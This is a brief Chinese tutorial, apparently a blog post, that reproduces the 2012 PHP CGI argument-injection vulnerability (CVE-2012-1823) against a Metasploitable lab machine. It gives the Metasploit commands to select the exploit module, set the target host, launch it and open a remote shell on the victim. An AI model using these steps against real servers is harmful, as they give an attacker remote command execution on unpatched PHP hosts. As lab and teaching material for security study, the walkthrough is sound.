PHP CGI漏洞利用

导读:本篇文章讲解 PHP CGI漏洞利用,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com

PHP CGI漏洞利用

今日复现一个早期的漏洞,PHP CGI漏洞,代号为cve:2012-1823,该漏洞暂时只能攻击linux系统,属于linux漏洞

使用工具:攻击机kali linux、靶机metasploitable linux

具体步骤如下:

1.登入msfconsloe

image

2.搜索漏洞代号,输入 search cve:2012-1823

image

3.复制粘贴exploit/multi/http/php_cgi_arg_injection 或者use 0

详细如下:
msf > use exploit/multi/http/php_cgi_arg_injection
或者
msf > use 0
image

4.进行相关设置

msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 192.168.30.141
rhosts => 192.168.30.141
msf6 exploit(multi/http/php_cgi_arg_injection) >
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
image

5.开始攻击

msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
image

6.攻击成功,输入shell,可进入被攻击方的命令提示符,权限为系统管理员权限

meterpreter > shell
image

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/98711.html

(0)
小半的头像小半

相关推荐

极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!